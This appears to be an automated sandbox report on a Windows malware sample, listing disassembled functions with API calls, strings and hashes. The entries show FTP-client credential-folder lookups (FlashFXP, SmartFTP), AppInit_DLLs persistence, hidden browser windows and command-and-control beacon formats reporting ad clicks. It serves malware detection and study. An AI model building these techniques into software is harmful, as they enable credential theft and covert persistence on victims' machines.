                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$Iy@$Iy@$confirm^rev=%s^code=%s^param=%s^os=%s
                  • API String ID: 3100629401-635595758
                  • Opcode ID: 5ec0742504e8b6ce822cdd6b2f5ebd3a5745a35b302eba6ce41e48f10c7b962e
                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                  • Opcode Fuzzy Hash: 5ec0742504e8b6ce822cdd6b2f5ebd3a5745a35b302eba6ce41e48f10c7b962e
                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  • Opcode ID: acbcbae15964d5679949d3320a4cd6b91d1bec546c7ba48790d4f92562249e59
                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                  • Opcode Fuzzy Hash: acbcbae15964d5679949d3320a4cd6b91d1bec546c7ba48790d4f92562249e59
                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID:
                  • String ID: http$+@
                  • API String ID: 0-4127549746
                  • Opcode ID: 819504698f78b8805a17497488f21e22e5f7ead229f15cb656ff7dd09d3720b7
                  • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                  • Opcode Fuzzy Hash: 819504698f78b8805a17497488f21e22e5f7ead229f15cb656ff7dd09d3720b7
                  • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: EnvironmentExpandFolderOpenPathStrings
                  • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                  • API String ID: 1994525040-4055253781
                  • Opcode ID: 2c9c97cb0e4b331afd6807a12706ed177aa93df05a890f4fa4eae1323a9dc38e
                  • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                  • Opcode Fuzzy Hash: 2c9c97cb0e4b331afd6807a12706ed177aa93df05a890f4fa4eae1323a9dc38e
                  • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  • Opcode ID: 0b84c150fe79eef348fa232134a2979da5830d61bcf949a9e3eece6736197f63
                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                  • Opcode Fuzzy Hash: 0b84c150fe79eef348fa232134a2979da5830d61bcf949a9e3eece6736197f63
                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                  APIs
                  • SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
                  • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                  • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                  • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                  • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  • API String ID: 362191241-2593661552
                  • Opcode ID: 60c93153f542f71cd59072b3db798985f13356a6db38c8d1cd4a9447dcb1fd0e
                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                  • Opcode Fuzzy Hash: 60c93153f542f71cd59072b3db798985f13356a6db38c8d1cd4a9447dcb1fd0e
                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  • API String ID: 876702719-0
                  • Opcode ID: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                  • Opcode Fuzzy Hash: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004088E4
                  • SysFreeString.OLEAUT32(?), ref: 004088E9
                  • SysFreeString.OLEAUT32(?), ref: 004089D3
                  • SysFreeString.OLEAUT32(?), ref: 004089D8
                  • SysFreeString.OLEAUT32(?), ref: 004089F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID: +@
                  • API String ID: 3341692771-3835504741
                  • Opcode ID: 846800c24ea5a5b9ff161930f7f614b8eb87560c1f77c722534116a1327d738e
                  • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                  • Opcode Fuzzy Hash: 846800c24ea5a5b9ff161930f7f614b8eb87560c1f77c722534116a1327d738e
                  • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                  • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Window$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2250723864-3455059086
                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 4d1bc242cb33ba376acabb77e8562130d532cafd4101d87aa7673051eb511c6b
                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                  • Opcode Fuzzy Hash: 4d1bc242cb33ba376acabb77e8562130d532cafd4101d87aa7673051eb511c6b
                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID: J(@
                  • API String ID: 3143865713-2848800318
                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,?,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                  • String ID: UniqueNum
                  • API String ID: 1853814767-3816303966
                  • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                  • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?), ref: 00408628
                  • GetLastError.KERNEL32 ref: 0040864A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll), ref: 00408687
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                  • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                  • API String ID: 4026185228-3265104503
                  • Opcode ID: fbb25ce4fb2133be7a5b5419f21f392892fccd3598b8746d09e161acbdde3d5e
                  • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                  • Opcode Fuzzy Hash: fbb25ce4fb2133be7a5b5419f21f392892fccd3598b8746d09e161acbdde3d5e
                  • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  • API String ID: 2525500382-2286408829
                  • Opcode ID: 80cffecdc154f3961d55a3c5b79764381f6831437f998c4d45a612bfa985b786
                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                  • Opcode Fuzzy Hash: 80cffecdc154f3961d55a3c5b79764381f6831437f998c4d45a612bfa985b786
                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,?,?,00000000,?,004027BD,?,00000001,00000000,?,?), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  • 0, xrefs: 0040AA5B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  • API String ID: 3713053250-1268808612
                  • Opcode ID: 657de2879450c9422a419422cfac0453d78696076c5176cbe160fbb3b63a9354
                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                  • Opcode Fuzzy Hash: 657de2879450c9422a419422cfac0453d78696076c5176cbe160fbb3b63a9354
                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                  • CloseHandle.KERNEL32(?), ref: 00408452
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 1974014688-0
                  • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                  • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                  • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                  • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  • Opcode ID: b4e0c7fb39f83403c03b5f090b9d6f141d07a3f8a6ffa7c0d9c020d846c222da
                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                  • Opcode Fuzzy Hash: b4e0c7fb39f83403c03b5f090b9d6f141d07a3f8a6ffa7c0d9c020d846c222da
                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                  Strings
                  • personal favorites, xrefs: 00405176
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  • folder, xrefs: 00405184
